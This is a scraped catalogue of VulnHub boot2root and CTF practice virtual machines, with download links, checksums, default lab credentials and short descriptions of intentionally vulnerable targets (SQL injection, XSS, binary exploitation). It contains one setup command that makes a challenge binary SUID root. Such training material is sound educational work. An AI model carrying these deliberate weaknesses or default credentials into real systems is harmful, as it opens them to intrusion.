The Pentesters: 64-Bit AppSec Primer (Beta)1 Jul 2016Austin WileThe Pentesters1.3 GBhttps://download.vulnhub.com/64bitprimer/64bitprimer.ovaHere at The Pentesters, we have a passion for application security and all that goes with it. We think that application security is an extremely important part of the field of information security and have, “made it our business” so to speak to provide a means of education into modern-day application security. With modern computing becoming more and more advanced, and the requirements for understanding the functionality and security behind said computing becoming equally as challenging to understand, we figured that perhaps giving a set of challenges dedicated to learning the mere basics of 64 bit appsec would be beneficial to the security community.The 64-Bit AppSec Primer consists of 16 challenges, increasingly more difficult than the previous one, dedicated to learning the basics of 64 bit binary exploitation and reverse engineering. The x64 instruction set, as you would expect, has many new instructions, registers, and calling conventions in comparison to the traditional x86 instruction set. Our goal, with this challenge, is to get you inside a debugger with intentionally vulnerable binaries, and get you looking at the inner-workings of a 64 bit binary. Alongside the increasing complexity of the instruction set, is an equally complexity of exploitation, which as a penetration tester and security engineer, will prove useful to understand. The challenges consist of varying vulnerabilities and anti-debugger tricks in binaries, such as: As a bonus, we would like to contribute back to the security community. We are donating the VM to Vulnhub, for all to have, and we are also offering prizes to three people who gives us the most robust and complete write-up for the challenges. In order to qualify for the prizes, you must post your write-up on either your personal blog, or website (your choice), and post a link to http://thepentesters.net/challenge/ along with your username. If you are unable to solve all of the challenges, that is okay, we will still accept your write-up for judging, we still want to see what you completed and how you did it. Here are the prizes: The challenge ends on August 31st, 2016. All write-ups must be submitted by then, whoever has written the best write-up with the most detailed explanations wins. The judging will be done by our pentesting team. Also, I would like to note a couple rules for the reverse engineering challenges. There are a couple challenges that don’t have “flags” but you will know when you have solved those, please note your findings and take screen-shots of them as well. As for the VM, you are to ssh in as user n00b and password n00b where you will find gdb-peda installed for you to make your life easier. The VM gets its IP through DHCP and is set to host-only adapter in VMware, so it should work for you straight out of the box so to speak. That is all I have for you and I hope you enjoy.A61B36DAA7ADBCF57E8DD499E82695CB26E74509F7C869BB146727BEE85782D3243328F9Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
PwnLab: init1 Aug 2016ClaorPwnLab785 MBhttps://download.vulnhub.com/pwnlab/pwnlab_init.ovaWellcome to “PwnLab: init”, my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something. The purpose of this CTF is to get root and read de flag.Can contact me at: or on Twitter: @ChronicoderCE8AB26DE76E5883E67D6DE04C0F6E43575F19216A3FA3E377EFE69D5BF715913F294A3BVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Mr-Robot: 128 Jun 2016Leon JohnsonMr-Robot704MBhttps://download.vulnhub.com/mrrobot/mrRobot.ovaBased on the show, Mr. Robot.This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find. The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.BC02C42815EAC4E872D753E1FD12DDC8DC0EB84DA4C62284C688590EE092868CE84A09ABVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
6Days Lab: 1.125 Jul 2016CanYouPwn.Me6Days Lab682 MBhttps://download.vulnhub.com/6daylab/6Days_Lab-v1.0.1.ovaBoot2root machine for educational purposesOur first boot2root machine, execute /flag to complete the game. Try your skills against an environment protected by IDS and sandboxes! “Our product Rashomon IPS is so good, even we use it!” they claim. Hope you enjoy. v1.0 - 2016-07-12 v1.1 - 2016-07-2598DE1E26447B2BFF260DF10441225820C56F6774F51A22571E6F0D7033639AC86DC822C0Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Breach: 2.115 Aug 2016mrb3nBreach1.3 GBhttps://download.vulnhub.com/breach/Breach-2_final2.1.zipSecond in a multi-part series, Breach 2.0 is a boot2root/CTF challenge which attempts to showcase a real-world scenario, with plenty of twists and trolls along the way.The VM is configured with a static IP ( so you’ll need to configure your host only adaptor to this subnet. Sorry! Last one with a static IP 😉 A hint: Imagine this as a production environment during a busy work day. Shout-out to knightmare for many rounds of testing and assistance with the final configuration as well as rastamouse, twosevenzero and g0blin for testing and providing valuable feedback. As always, thanks to g0tmi1k for hosting and maintaining #vulnhub. VirtualBox users: if the screen goes black on boot once past the grub screen make sure to go to settings —> general, and make sure it says Type: Linux Version: Debian 64bit If you run into any issues, you can find me on Twitter: https://twitter.com/mrb3n813 or on IRC in #vulnhub. Looking forward to the write-ups, especially any unintended paths to local/root. Happy hunting! SHA1:D8F33A9234E107CA745A8BEC853448408AD4773F Note: v2.1 fixes a few issues. ## Changelog+ 2016-08-22 - v2.1+ 2016-08-15 - v2.090E8871E8EB68ADBEB82659FE1F11831069B529B6701FDF9F82840F9918842921FFB7A1EVirtual Machine (Virtualbox - OVA)LinuxDisabled192.168.110.151
SecTalks: BNE0x02 - Fuku9 Oct 2015Robert WinkelSecTalks2.0GBhttps://download.vulnhub.com/sectalks/Fuku.ovaFuku (pronounced “far queue”) CTF is designed to fuck with people.[This is a boot2root. Import it in VirtualBox, using a Host Only adapter, or use an adapter that will assign it an IP address in the range. It only likes having an IP address in that range. Treat the box as if it was on the network. Don’t try to do anything to it that you could only do with physical access, e.g. break into the BIOS or the Grub boot loader. There are a few flag.txt files to grab. The final one is in the /root/ directory. However, the ultimate goal is to get a root shell. “Bull was pissed when you broke into his Minotaur box. He has taken precautions with another website that he is hosting, implementing IDS, whitelisting, and obfuscation techniques. He is now taunting hackers to try and hack him, believing himself to be safe. It is up to you to put him in his place.” The VM is located at https://www.dropbox.com/s/e2x79z5ovqqsejg/Fuku.ova?dl=0 File size: 2GB] Contact @RobertWinkel for more hints.F27CB4A2E792805C8B93F99CFA852D694524CA5DDCE06C09E5EDB4F94802B02476AC7D6FVirtual Machine (Virtualbox - OVA)LinuxDisabled192.168.56.0
Sidney: 0.23 Jun 2016knightmareSidney921MBhttps://download.vulnhub.com/sidney/Sidney0.2.ovaWelcome to my third boot2root / CTF this one is called Sidney. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag, and being me, it’s never where they normally live… 😎If you are having trouble with the NIC, make sure the adapter is set to use the MAC 00:0C:29:50:14:56 Some hints for you: SHA1SUM: 114ABA151B77A028AA5CFDAE66D3AEC6EAF0751A sidney.ova Many thanks to Rasta_Mouse and GKNSB for testing this CTF. Special thanks and shout-outs go to GKNSB and Rasta_Mouse, hopefully he streams this one live too! Also a shout-out to g0tmi1k for #vulnhub and offering to host my third CTF.4725E5ABABA7F840B56C5F4AE67F35CB114ABA151B77A028AA5CFDAE66D3AEC6EAF0751AVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Gibson: 0.215 May 2016knightmareGibson642 MBhttps://download.vulnhub.com/gibson/gibson.ovaWelcome to another boot2root / CTF this one is called Gibson. The VM is set to grab a DHCP lease on boot. It doesn’t matter what your local subnet is, as long as you keep away from the subnet. You will see why soon enough…Once again, I’ll offer some hints to you: SHA1SUM: Many thanks to g0blin and GKNSB for testing this CTF. Special thanks and shout-outs go to Barrebas and Rasta_Mouse. and g0tmi1k for more advice and offering to host my second CTF. Kudos to g0blin for adivsing on how to use this in Vi Virtual box users can run:06464F2A6C5D755CBFB1471D757BB420F4601F62B7011CC6AD403553CB8A9375E43CB0B5Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Stapler: 18 Jun 2016g0tmi1kStapler707 MBhttps://download.vulnhub.com/stapler/Stapler.zipSlides: https://download.vulnhub.com/stapler/slides.pdfA30EA8F606102F2F929AAFB198D8B01918165C527DF1EC7B2B80CC82E5BEBE88A9323013Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Droopy: v0.217 Apr 2016knightmareDroopy455 MBhttps://download.vulnhub.com/droopy/DroopyCTF.ovaWelcome to Droopy. This is a beginner’s boot2root/CTF VM.The VM is set to grab a DHCP lease on boot. There’s 2 hints I would offer you: 1.) Grab a copy of the rockyou wordlist. 2.) It’s fun to read other people’s email. SHA1SUM: e6862fa5ebc9c2a8e582e77f440510062afe47ba droopyctf.ova Special thanks and shout-outs go to Barrebas and Rasta_Mouse for testing, and g0tmi1k for advice and offering to host my first CTF.2961AD42C047F9DC8C0E3D9CAA952696E6862FA5EBC9C2A8E582E77F440510062AFE47BAVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
VulnOS: 217 May 2016c4b3rw0lfVulnOS763 MBhttps://download.vulnhub.com/vulnos/VulnOSv2.7zSmaller, less chaotic !As time is not always on my side, It took a long time to create another VulnOS. But I like creating them. The image is build with VBOX. Unpack the file and add it to your virtualisation software. NOTE : current keyboard preferences is BE “pentesting is a wide concept” If you have questions, feel free to contact me on dot com Shout out to the Vulnhub Testing team! Hope you enjoy.0C84AE77AE3C47F84E8B0F830D3C43B4A77E312E8A3900C9FDA61421C3C9F2FB78F819BDVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
SecTalks: BNE0x03 - Simple9 Oct 2015Robert WinkelSecTalks593 MBhttps://download.vulnhub.com/sectalks/Simple.ovaSimple CTF is a boot2root that focuses on the basics of web based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal.[I suggest you use VirtualBox or VMWare Player with a Host Only adapter. The VM will assign itself an IP address through DHCP. https://www.dropbox.com/s/9spf5m9l87zjlps/Simple.ova?dl=0 File size: 600MB] Contact @RobertWinkel for more hints.Requires VirtualBox Extension Pack.6D452F0A658B453706F41A5A694D99A18E1D16D500E7BBC218D150F8A199B3C14D730B2CVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
SkyDog: 12 Nov 2015James BowerSkyDog580 MBhttps://download.vulnhub.com/skydog/SkyDogCTF.ova http://bit.ly/SkyDogConCTFThe CTF is a virtual machine and works best in Virtual Box. This OVA was created using Virtual Box 4.3.32. Download the OVA file open up Virtual Box and then select File –> Import Appliance. Choose the OVA file from where you downloaded it. After importing the OVA file above it is best to disable the USB 2.0 setting before booting up the VM. The networking is setup for a NAT Network but you can change this before booting up depending on your networking setup. If you have any questions please send me a message on Twitter @jamesbower and I’ll be happy to help. The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself. The six flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533 Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words) Flag #2 When do Androids Learn to Walk? Flag #3 Who Can You Trust? Flag #4 Who Doesn’t Love a Good Cocktail Party? Flag #5 Another Day at the Office Flag #6 Little Black BoxYou may need to disable the USB device in VirtualBox for it to start up.DF6B5201C29C9157B852C383D4760643EA2DCACC68837D3E24DE32C88CD2FC4EE026030FVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Seattle: v0.34 Oct 2016HollyGracefulSeattle580 MBhttps://download.vulnhub.com/seattle/Seattle-’s VulnVM is web application running on a virtual machine, it’s designed to simulate a simple eCommerce style website which is purposely vulnerable to a number of well know security issues commonly seen in web applications. This is really a pre-release preview of the project but it’s certainly functional as it stands, but I’m planning on doing a lot of work on this in the near future.The plan is ultimately to have the application vulnerable to a large number of issues with a selection of different filters at different difficulties that way the as testers become better at detecting and exploiting issues the application can get hardened against common exploitation methods to allow the testers a wider ranger of experiences. The first filters have now been implemented! The application now supports “levels” where Level 1 includes no real filtration of user input and Level 2 includes a simple filter for each vulnerable function. Currently it’s vulnerable to: Install p7zip to unzip *.7z files on Fedora: Install p7zip to unzip *.7z files on Debian and Ubuntu: Extract the archive: Then you can simply start up the virtual machine using Virtual Box! The root user account has a password of PASSWORD0175A804BB4FCBB2F3DC341C0668AFE441434C47FE48584621EE724A0CD541CDFB71CEC8Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
SickOs: 1.227 Apr 2016D4rkSickOs664 MBhttps://download.vulnhub.com/sickos/sick0s1.2.zipNeed to use VMware. You may have issue with VirtualBox. Possible solution: Open the .ovf file and replace all instances of “ElementName” with “Caption” and replace “vmware.sata.ahci” with “AHCI”. Also removethe .mf file and then import as per normal.B013BA76F50C15890554632A40B697BD9F45F7C060E15DC6BB93C1CF39EFDD75125E30A0Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
SecTalks: BNE0x00 - Minotaur9 Oct 2015Robert WinkelSecTalks676 MBhttps://download.vulnhub.com/sectalks/minotaur_CTF_BNE0x00.ovaMinotaur is a boot2root CTF. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal.[I suggest you use VirtualBox with a Host Only adapter to run Minotaur fairly painlessly. The VM will assign itself a specific IP address (in the range). Do not change this, as the CTF will not work properly without an IP address of 192.168.56.X. If you load the .ova file in VirtualBox, you can see this machine from another VirtualBox machine with a “Host Only” network adapter. You can see the machine from VMWare Workstation by: - Going into Virtual Network Editor and changing the VMnet0 network to “Bridged to: VirtualBox Host-Only Ethernet Adapter”. - Setting your VMWare network adapter to Custom (VMnet0) - If necessary, resetting your network adapter (e.g. ifdown eth0 && ifup eth0) so that you get a address. The VM is located here: https://www.dropbox.com/s/zyxbampga87nqv3/minotaur_CTF_BNE0x00.ova?dl=0 File size: 691MB] Contact @RobertWinkel for more hints.5CB751E8A017EB13702377E86D07CA86E2656937662CBB8DE23E92E0D3346A8A0A19C2C2Virtual Machine (Virtualbox - OVA)LinuxDisabled192.168.56.0
Milnet: 11 Jun 2016WarriorMilnet835MBhttps://download.vulnhub.com/milnet/milnet-1.0-ova.tgzWelcome to 1989!And welcome to Germany! This VM is inspired by a book! There should be plenty of hints which one it is, if you havent read it. This is a simple VM, so dont fear any advanced exploitation, reverse engineering or other advanced techniques! Just a solid and simple advanced persistent threat (admins) 😉 So the level is clearly: beginner (as intended). For some it may teach a solid (old) new Privesc technique that together with the above mentioned book inspired me to this VM. I made the effort to throw some very basic story/polish into it. Also if everythin runs smoothly the VM should show its IP adress in the Login screen on the console! -No, I dont consider finding the VM in your own network a real challenge 😉- If you should encounter any problems or want to drop me a line use #milet and @teh_warriar on twitter or chat me up in #vulnhub! Hope you enjoy this VM! Gonna enjoy reading some writeups and hope you might find other ways then the intended ones! Best Regards WarriorTo convert the VM so it works with Virtualbox:qemu-img convert0EFD13A81D071B9350DDA805CFE0F39FA5FC8F453BB0E6F9DED7FE2FA280A92E47D0893BVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
NETinVM: November 3, 20163 Nov 2016Carlos Perez & David PerezNETinVM2.2 GBhttps://download.vulnhub.com/netinvm/netinvm_2016-11-03_vmware.zipA tool for teaching and learning about systems, networks and securityAuthors: Carlos Perez & David Perez Date: 2016-11-03 NETinVM is a VMware virtual machine image that provides the user with a complete computer network. For this reason, NETinVM can be used for learning about operating systems, computer networks and system and network security. In addition, since NETinVM is a VMware image, it can be used for demonstrations (i.e. in classrooms) that can be reproduced by students either in a laboratory or on their own laptop and thus, at home, at the library… For these reasons we present NETinVM as an educational tool. NETinVM is a VMware virtual machine image that contains, ready to run, a series of User-mode Linux (UML) virtual machines. When started, the UML virtual machines create a whole computer network; hence the name NETinVM, an acronym for NETwork in Virtual Machine. This virtual network has been called ‘example.net’ and has fully qualified domain names defined for the systems: ‘base.example.net’, ‘fw.example.net’, etc. All of the virtual machines use the Linux operating system. The VMware virtual machine is called ‘base’ and it runs openSUSE 13.2. User-mode Linux machines use Debian 6.0 and they have different names depending on their network location, because they are grouped into three different subnets: corporate, perimeter and external. The subnetworks are named ‘int’ (for internal network), ‘dmz’ (for DMZ or demilitarized zone, usually used as a synonym for perimeter network) and ‘ext’ (for external network). One of the UML machines, ‘fw’, interconnects the three networks ('int, ‘dmz’ and ‘ext’), allowing for communication and packet filtering. The rest of the UML machines have only one network interface, connected to the network they are named after: + UMLs connected to the internal network. + UMLs connected to the perimeter network (DMZ). They are supposed to be bastion nodes. Two preconfigured bastion nodes are provided, each one with its appropriate alias: + ‘dmza’ is aliased as ‘www.example.net’ and it offers HTTP and HTTPS services. + ‘dmzb’ is aliased as ‘ftp.example.net’ and it offers FTP. + UMLs connected to the external network (ie: Internet). Because a picture paints a thousand words, or so they say, the following figure shows NETinVM with all of the virtual machines running inside. All of the elements referenced before are shown in the image with their IP and ethernet addresses. The following rules have been used for assigning addresses: In addition to the computers and networks already described, the figure also shows the real computer where NETinVM runs (‘REAL COMPUTER’) and VMware Player’s typical network interface (‘vmnet8’), which optionally interconnects NETinVM’s networks with the external word. When they boot, all UML virtual machines get their network configuration from ‘base’, which provides DHCP and DNS services to the three NETinVM networks through its interfaces ‘tap0’, ‘tap1’ and ‘tap2’. Routing works as follows: Communication between ‘base’ and any UML machine, in both directions, is direct, without going through ‘fw’. (When the communication is started from a UML machine, the IP address of the interface of ‘base’ in the corresponding network must be used.) This configuration permits access from ‘base’ to all UML machines using SSH independently of the packet filtering configuration at ‘fw’. As an additional consideration, please note that the SNAT configuration in ‘fw’ described above is necessary for responses to outgoing connections to the Internet originating from the internal or perimeter networks to come back through ‘fw’. Otherwise they would be routed directly from ‘base’ to the UML machine through ‘tap1’ or ‘tap2’ without traversing ‘fw’.3396D92F07D52471FA65B614086DE3965EFBDEB2AD825BAFB838C8B11978F9ED32A67D8DVirtual Machine (VMware)LinuxEnabledAutomatically assign
SmashTheTux: 1.0.11 Apr 2016CanYouPwn.MeSmashTheTux616 MBhttps://download.vulnhub.com/smashthetux/SmashTheTux_v1.0.1.7zSmashTheTux is a new VM made by canyoupwn.me for those who wants to take a step into the world of binary exploitation. This VM consists of 9 challenges, each introducing a different type of vulnerability. SmashTheTux covers basic exploitation of the following weaknesses:Credentials => : , : Have fun!SmashTheTux v1.0 (18/03/2016)“It appears that we’ve forgot to set permissions necessary on 0x02, sorry about that 😕 Use the root credentials and set the executable file’s ownership to root and then add a suid bit. Sorry for inconvenience.sudo chown root.tux /home/tux/0x02/pwnme && sudo chmod u+s /home/tux/0x02/pwnme…Else get v1.0.1”63FEDA288163D9155B1BF84D1C6C281401DCB1AB85B139A386AD97B41190731509612F59Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
SpyderSec: Challenge4 Sep 2015SpyderSecSpyderSec2.4 GBhttps://download.vulnhub.com/spydersec/SpyderSecChallenge.ovaYou are looking for two flags. Using discovered pointers in various elements of the running web application you can deduce the first flag (a downloadable file) which is required to find the second flag (a text file). Look, read and maybe even listen. You will need to use basic web application recon skills as well as some forensics to find both flags.: Intermediate The virtual machine comes in an OVA format, and is a generic 32 bit CentOS Linux build with a single available service (HTTP) where the challenge resides. Feel free to enable bridged networking to have the VM automatically be assigned a DHCP address. This VM has been tested in VMware Workstation 12 Player (choose “Retry” if needed), and VirtualBox 4.3. : f60f497f3f8fda0d0aeccfc84dad8e19ad164f55 Challenge.ova : @SpyderSecC3370138A79E68C2F00BDF3A31F7809BF60F497F3F8FDA0D0AECCFC84DAD8E19AD164F55Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
The Wall: 127 Nov 2015XerubusThe Wall286 MBhttps://download.vulnhub.com/thewall/thewall.ovaThis boot2root box is exclusive to VulnHub. If you have a crack at the challenge, please consider supporting VulnHub for the great work they do for our offsec community.In 1965, one of the most influential bands of our times was formed… Pink Floyd. This boot2root box has been created to celebrate 50 years of Pink Floyd’s contribution to the music industry, with each challenge giving the attacker an introduction to each member of the Floyd. You challenge is simple… set your controls for the heart of the sun, get root, and grab the flag! Rock on!This works better with VirtualBox than VMware.Note, there is more to this than port scanning…A5E6EBDE160239BCE605CCA8E1CF207DA2520E21CF28752FB317F9DDB4143229702BC21BVirtual Machine (Virtualbox - OVA)BSDEnabledAutomatically assign
Lord Of The Root: 1.0.123 Sep 2015KookSecLord Of The Root1.6 GBhttps://download.vulnhub.com/lordoftheroot/LordOfTheRoot_1.0.1.ovaI created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on the OSCP.This is a boot-to-root machine will not require any guest interaction. There are two designed methods for privilege escalation. If you are having issues with VirtualBox, try the following: Source: https://twitter.com/dooktwit/status/646840273482330112BDDA2E8D966E014FE9301A2FEA81F37C98FB6280820278D54EE3D62F2DDAAD27A725934EVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Kevgir: 115 Feb 2016CanYouPwn.MeKevgir1.3 GBhttps://download.vulnhub.com/kevgir/Kevgir-VM.ovaKevgir has designed by canyoupwnme team for training, hacking practices and exploiting. Kevgir has lots of vulnerable services and web applications for testing. We are happy to announced that.Have fun! Default username:pass => :75DAD90BC1B57A166D640B83C7BAA7DC38E12F8DC93F519C6F716EAC6BEE1632BC199811Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Csharp: VulnJson4 Jan 2016Brandon PerryCsharp1.9 GBhttps://download.vulnhub.com/csharp/CsharpVulnJson.ovaThe CsharpVulnJson virtual appliance is a purposefully vulnerable web application, focusing on HTTP requests using JSON to receive and transmit data between the client and the server. The web application, listening on port 80, allows you to create, find, and delete users in the PostgreSQL database. The web application is written in the C# programming language, uses apache+mod_mono to run, and is, at the very least, exploitable by XSS and SQL injections.The SQL injections yield a variety of potential exploit techniques since different SQL verbs are used to perform actions against the server. For instance, a SQL injection in an INSERT statement may not be exploitable in the same ways the DELETE or SELECT statements will be. Using a tool like sqlmap will help you learn how to exploit each SQL injection vulnerability using a variety of techniques. If you are curious how sqlmap is performing the checks for, and ultimately exploiting, the vulnerabilities in the web application, you can use the --proxy option for sqlmap and pass the HTTP requests through Burpsuite. You can then see in the HTTP history tab the raw HTTP requests made by sqlmap.D3939E812102368EC34F92C30EA2CBEDF3FD7B4C043681EFDFE3F6B70964A2B8F2E86FF7Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
FristiLeaks: 1.314 Dec 2015Ar0xAFristiLeaks668 MBhttps://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ovaVMware users will need to manually edit the VM’s MAC address to: 08:00:27:A5:A6:76206C9D1C0F29248CB3EC1873A56E49404AB71D307E6D9AA3CEFE7547DDC1F987D738C596Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
PRIMER: 1.0.115 Jan 2016Arne RickPRIMER640MBhttps://download.vulnhub.com/primer/PRIMER.tar1) Run the OVA in a VM and connect to the webserver 2) Have Fun!couchsofa morbidick einball sarah I would probably have never finished’, this project without you guys 😉', mostley For hinting me to Erik Österberg’s Terminal.js 0xBEEF For providing fuel in the form of fudge and premium grilled goods More information: http://wiki.fablab-karlsruhe.de/doku.php?id=projekte:primer A friend wanted to get into some simple exploits. I suggested starting out with web security, she was all for it. But when I started browsing vulnhub and the likes I couldn’t find anything like I had in mind. So I wrote my own. This is a story based challenge written in a style heavily inspired by Neil Stephensons Snow Crash and William Gibsons Sprawl Trilogy. Each chapter is unlocked by solving the puzzle. From hardcoded clear text javascript password checks, SQL-injections and cracking hashes to a simulated terminal. You only need to start the VM, a webserver will come up and you can connect with your browser. In fact you never have to leave the browser. Teach some basic well known techniques and attacks. Spark some curiosity, make the user look at the source code and try to figure out what’s going on behind the scenes. The main goal is to give a nice welcoming intro to the scene and hopefully also teach something about ethics and responsibility. v1.0.1 - 2016-01-15: https://twitter.com/CouchSofa/status/688129147848138752 v1.0.0 - 2015-10-27: https://twitter.com/CouchSofa/status/659148660152909824Username: nievePassword: PRIMERD0233F6D0FDE41A56925E8FEF29902CA5315D9856A1F52E491D65F10417015CB1986C60CVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
SickOs: 1.111 Dec 2015D4rkSickOs623 MBhttps://download.vulnhub.com/sickos/sick0s1.1.7z396E46897C54DA6DED6604B861C806B73578A10BA92F860C2F0D8934EC5A9BBFFC4C7859Virtual Machine (VMware)LinuxEnabledAutomatically assign
Acid: Reloaded1 Sep 2015Avinash Kumar ThapaAcid1006 MBhttps://download.vulnhub.com/acid/Acid-Reloaded.7zThe named of the Virtual machine is “Acid-Reloaded”. This Virtual Machine contains both network logics and web logics. I have added new concept here and let’s see how many of you think more logically. 😃You need to extract the rar and run the vmx using VMplayer . The machine has DHCP active list so once automatically assign an IP network, the next step will be to identify the target and discover the / the service / s to start the game. Escalate the privileges to root user and capture the flag. Once any one able to beat the box then shoot me a mailNote, do not use any local methods - including logging in as the ‘Guest’ user on the guest OS.9EF7460E94A59D9F4553B3DA364F82B55FF8EC8F44394FF9CAB9D3A9670B27DC1054157DVirtual Machine (VMware)LinuxEnabledAutomatically assign
Csharp: VulnSoap4 Jan 2016Brandon PerryCsharp1.8GBhttps://download.vulnhub.com/csharp/CsharpVulnSoap.ovaThe CsharpVulnSoap virtual appliance is a purposefully vulnerable SOAP service, focusing on using XML, which is a core feature of APIs implemented using SOAP. The web application, listening on port 80, allows you to list, create, and delete users in the PostgreSQL database. The web application is written in the C# programming language and uses apache+mod_mono to run. The main focus of intentional vulnerabilities was SQL injections.The vulnerable SOAP service is available on http:///Vulnerable.asmx, and by appending ?WSDL to the URL, you can get an XML document detailing the functions exposed by the service. Using this document, you can automatically fuzz the endpoint for any vulnerabilities by parsing the document and creating the HTTP requests expected programmatically. The SQL injections yield a variety of potential exploit techniques since different SQL verbs are used to perform actions against the server. For instance, a SQL injection in an INSERT statement may not be exploitable in the same ways the DELETE or SELECT statements will be. Using a tool like sqlmap will help you learn how to exploit each SQL injection vulnerability using a variety of techniques. If you are curious how sqlmap is performing the checks for, and ultimately exploiting, the vulnerabilities in the web application, you can use the --proxy option for sqlmap and pass the HTTP requests through Burpsuite. You can then see in the HTTP history tab the raw HTTP requests made by sqlmap.C4E9BC90C4B25014C99A545B69DDCC3F3CDBFA9ABB24F2FC69AA1A556C9A2B4DFA24DA44Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
NullByte: 11 Aug 2015ly0nNullByte954 MBhttps://download.vulnhub.com/nullbyte/NullByte.ova.zipCodename: NB0x01Download: ly0n.me/nullbyte/NullByte.ova.zip Objetcive: Get to /root/proof.txt and follow the instructions. Level: Basic to intermediate. Description: Boot2root, box will get IP from dhcp, works fine with virtualbox&vmware. Hints: Use your lateral thinking skills, maybe you’ll need to write some code.1D38B727B359B38466580839790C428F1AA5CC0618EE33B43E5B65ACD0467901898CF53BVirtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
TopHatSec: Freshly18 Feb 2015TopHatSecTopHatSec863 MBhttps://download.vulnhub.com/tophatsec/Freshly.ovaThe goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. 😃There are a couple of different ways that you can go with this one. Good luck! Simply download and import the OVA file into virtualbox!You may have issues when importing to VMware. If this is the case. extract the HDD from the OVA file (using something like 7zip), and attach to a new VM.Please see the following guide: https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/.7F9B6DEFEF069D44031D1FAE2FDC461AD84D70645B35B81B6566577933A610F899D26229Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
TopHatSec: FartKnocker6 Mar 2015TopHatSecTopHatSec593 MBhttps://download.vulnhub.com/tophatsec/FartKnocker.ovaNew VM challenge that should be fun for people trying to get into packet analysis!There are several steps to this box. I created it with virtualbox. The VM is built on: Ubuntu 14.04 32 bit If you beat the box then please shoot me an email! Have fun guys! P.S. I got the word “Fart Knocker” from watching beavis and butthead back in the day. Otherwise you kids might not understand 😃 You may have issues when importing to VMware. If this is the case. extract the HDD from the OVA file (using something like 7zip), and attach to a new VM.Please see the following guide: https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/.0640BEAB0D41BA88FB98337AEDF0E2F944202E69FAB428EE13039D274037CF8C9DDD6832Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
Acid: Server15 Aug 2015Avinash Kumar ThapaAcid1.1 GBhttps://download.vulnhub.com/acid/Acid.rarWelcome to the world of Acid.Fairy tails uses secret keys to open the magical doors. The named of the Virtual machine is " r". This Virtual Machine is completely . I have added little new concept here and hope people will enjoy solving this.You need to extract the and run the using . The machine has active list so once automatically assign an IP network, the next step will be to identify the target and discover the / the service / s to start the game. Escalate the privileges to root and capture the flag. Once anyone able to beat the machine then please let me know. Twitter: LinkedIn:96A4E4D0F9BDCADB4A0011DA1D5ED64FC31DA966F12AC18457FBC1BFA2B02ED1DF0E16E3Virtual Machine (VMware)LinuxEnabledAutomatically assign
Flick: 220 Aug 2015LeonjzaFlick566 MBhttps://download.vulnhub.com/flick/flickII.zipWelcome!Your challenge, should you choose to accept, is to gain root access on the server! The employees over at Flick Inc. have been hard at work prepping the release of their server checker app. Amidst all the chaos, they finally have a version ready for testing before it goes live. You have been given a pre-production build of the Android .apk that will soon appear on the Play Store, together with a VM sample of the server that they want to deploy to their cloud hosting provider. The .apk may be installed on a phone (though I wont be offended if you don’t trust me ;]) or run in an android emulator such as the Android Studio (https://developer.android.com/sdk/index.html). Good Luck! $ shasum * e74061c5348fef33d00f5f4f2aee9e921c591129 flick-check-dist.apk e6fbcd5aab5ed95c54d02855fdfbad74587f3db7 flickII-dist.ova Note: Vmware will complain about the OVF specification. Just click retry on the import and everything should be ok! Shouts:Exclusive to VulnHub!ED794C697A2F5681DC60DCE14759897F2DBC54908862CB5B0D43C613AFB7E5100DA5DE02Virtual Machine (Virtualbox - OVA)LinuxEnabledAutomatically assign
